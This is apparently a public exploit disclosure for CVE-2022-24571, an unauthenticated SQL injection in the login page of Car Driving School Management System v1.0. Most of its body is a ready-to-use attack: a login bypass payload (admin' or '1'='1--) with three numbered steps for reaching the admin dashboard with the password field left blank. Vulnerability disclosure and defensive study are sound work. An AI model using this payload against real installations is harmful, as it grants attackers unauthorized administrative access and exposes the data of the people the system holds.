Headline
CVE-2022-24571: OpenSource/exploit_sql at main · nsparker1337/OpenSource
Car Driving School Management System v1.0 is affected by SQL injection in the login page. An attacker can use simple SQL login injection payload to get admin access.
# Exploit Title: Car Driving School management System v1.0 - Unauthenticated Blind SQL Injection
# Exploit Author: NS Kumar (n1_x)
# Date: January 31, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cdsms_1.zip
# Tested on: Parrot Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Car Driving School management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to gain admin access.
````````````````````````````````````````` To Exploit````````````````````````````````````````````````````````
Step 1: Goto Login Page.
Step 2: Put the Payload admin’ or '1’=’1-- and Leave password field blank, then click Login button.
Step 3: Now you can Access the Admin Dashboard.
`````````````````````````````````````````````````````````````````````````````````````````````````````````````